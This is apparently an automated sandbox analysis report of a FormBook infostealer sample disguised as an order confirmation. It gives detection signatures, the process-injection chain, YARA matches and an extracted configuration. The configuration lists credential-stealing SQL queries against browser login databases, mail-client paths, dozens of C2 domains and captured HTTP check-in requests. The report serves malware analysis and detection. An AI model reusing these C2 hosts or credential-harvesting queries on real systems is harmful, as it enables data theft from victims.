
Analysis Report Order confirmation 64236000000025 26.01.2021.exe

Overview

General Information

Sample Name: Order confirmation 64236000000025 26.01.2021.exe
Analysis ID: 344999
MD5: b18e939428b3ffc67c750e2a0988d61a
SHA1: 405cc59b2da9a6187bd65e7c2fa4f9ebdae32111
SHA256: 238dd9cb9b1c235e2babbc3f3b1372da8d76e4d94a4440776814957e0fd09f0b
Tags: Adware, Generic, exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Order confirmation 64236000000025 26.01.2021.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe' MD5: B18E939428B3FFC67C750E2A0988D61A)
    • lqqebhptsg.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u MD5: C56B5F0201A3B3DE53E561FE76912BFD)
      • 9rd1hxro.exe (PID: 5732 cmdline: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u MD5: 535DD1329AEF11BF4654B3270F026D5B)
        • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • NETSTAT.EXE (PID: 1284 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 6352 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x87dc", "KEY1_OFFSET 0x1c8bf", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1c991", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1b493", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x404e269a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715036", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad01a6da", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01451", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", 
"0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", 
".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "amgggma.com", "reptilerus.com", "degearboss.com", "jennaelsbakeshop.com", "invisablescreen.com", "beingsingleda.com", "2nsupplements.online", "12862.xyz", "expand.care", "romeoalchimistefullmental.com", "7750166.com", "brendonellis.com", "sprayfoamharlemny.com", "bukannyaterbuai30.com", "boatpiz.com", "stylistrx.com", "decorationhaven.com", "stockaro.com", "state728.com", "secretlairtoys.com", "davenportnsons.com", "gofetchable.com", "xn--vhqqb859bnjqul4b7fg.com", "jsmcareers.com", "czb878.com", "reformadventist.com", "nishagile.com", "rotalablog.com", "beachesvr.com", "ekpays.com", "triphousestudio.com", "kusytekrealities.com", "madhabicorp.com", "husum-ferienwohnungen.com", "mitbss.com", "farmersly.com", "appcaoya.com", "ninjawhatsapp.club", "creuatrue.com", "watsonmedi.com", "purposelyproductivelab.com", "alliswell.info", "narichan01.com", "racevx.xyz", "swiftappliancessc.com", "aiguapea.com", "xn--kok-j59d107t.net", "informaprofiles.com", "denetimlitakip.net", "xtremesupplies.com", "motion-mill-tv.com", "thealtxmvmt.com", "sexeighty.com", "kiiteblog.com", "aoey.ink", "tiendastags.com", "politicalrefs.com", "lifeinsuranceyourway.com", "rozellrealtynj.com", "newsparika.com", "kettel.net", "taxandbookkeepingsolutions.com", "fashiongraphia.com", "coredigit.net", 
"f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.dmvantalya.com/bnuw/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.lqqebhptsg.exe.4dc0000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.lqqebhptsg.exe.4dc0000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.lqqebhptsg.exe.4dc0000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
2.2.9rd1hxro.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.9rd1hxro.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: Order confirmation 64236000000025 26.01.2021.exe | ReversingLabs: Detection: 50%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Order confirmation 64236000000025 26.01.2021.exe | Joe Sandbox ML: detected
Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.9rd1hxro.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.1.9rd1hxro.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Order confirmation 64236000000025 26.01.2021.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Order confirmation 64236000000025 26.01.2021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wntdll.pdbUGP | source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, 00000002.00000002.291392263.0000000000EFF000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe | Code function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe | Code function: 0_2_0040659C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe | Code function: 0_2_004027A1 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9CD14 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 172.120.228.88:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 172.120.228.88:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 172.120.228.88:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49761 -> 172.120.228.88:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49761 -> 172.120.228.88:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49761 -> 172.120.228.88:80
Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1 Host: www.taxandbookkeepingsolutions.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1 Host: www.rotalablog.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1 Host: www.expand.care Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1 Host: www.alliswell.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1 Host: www.czb878.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1 Host: www.brendonellis.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1 Host: www.purposelyproductivelab.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1 Host: www.ekpays.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1 Host: www.beachesvr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1 Host: www.secretlairtoys.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1 Host: www.dmvantalya.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1 Host: www.husum-ferienwohnungen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH HTTP/1.1 Host: www.swiftappliancessc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH HTTP/1.1 Host: www.state728.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: IMH-WESTUS IMH-WESTUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1Host: www.taxandbookkeepingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
